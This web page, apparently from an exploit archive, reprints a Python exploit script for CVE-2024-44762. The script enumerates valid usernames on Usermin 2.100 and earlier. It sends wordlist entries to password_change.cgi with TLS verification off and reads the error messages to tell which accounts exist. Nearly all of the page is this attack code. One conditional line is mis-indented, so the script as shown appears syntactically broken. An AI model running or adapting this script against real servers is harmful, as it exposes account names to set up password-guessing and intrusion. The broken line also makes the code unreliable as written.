Webmin Usermin 2.100 Exploit, Username Enumeration

# Exploit Title: Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt

import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

parser = argparse.ArgumentParser()

parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")

args = parser.parse_args()

if len(sys.argv) != 5:
    print("Please provide the -u for URL and -w for the wordlist containing the usernames")
    print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
    exit()

usernameFile = open(args.wordlist_users, 'r')

dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()

for i in usernameFileIntoList:

    newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
    params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
    response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
        if "Failed to change password: The current password is incorrect." in response.text:
        print("Possible user found with username: " + i)

    if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
        print("Application is most likely not vulnerable and are therefore quitting.")
        exit() # comment out line 33-35 if you would still like to try username enumeration.

Credits and Partners

All rights reserved nPulse.net 2009 - 2025
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD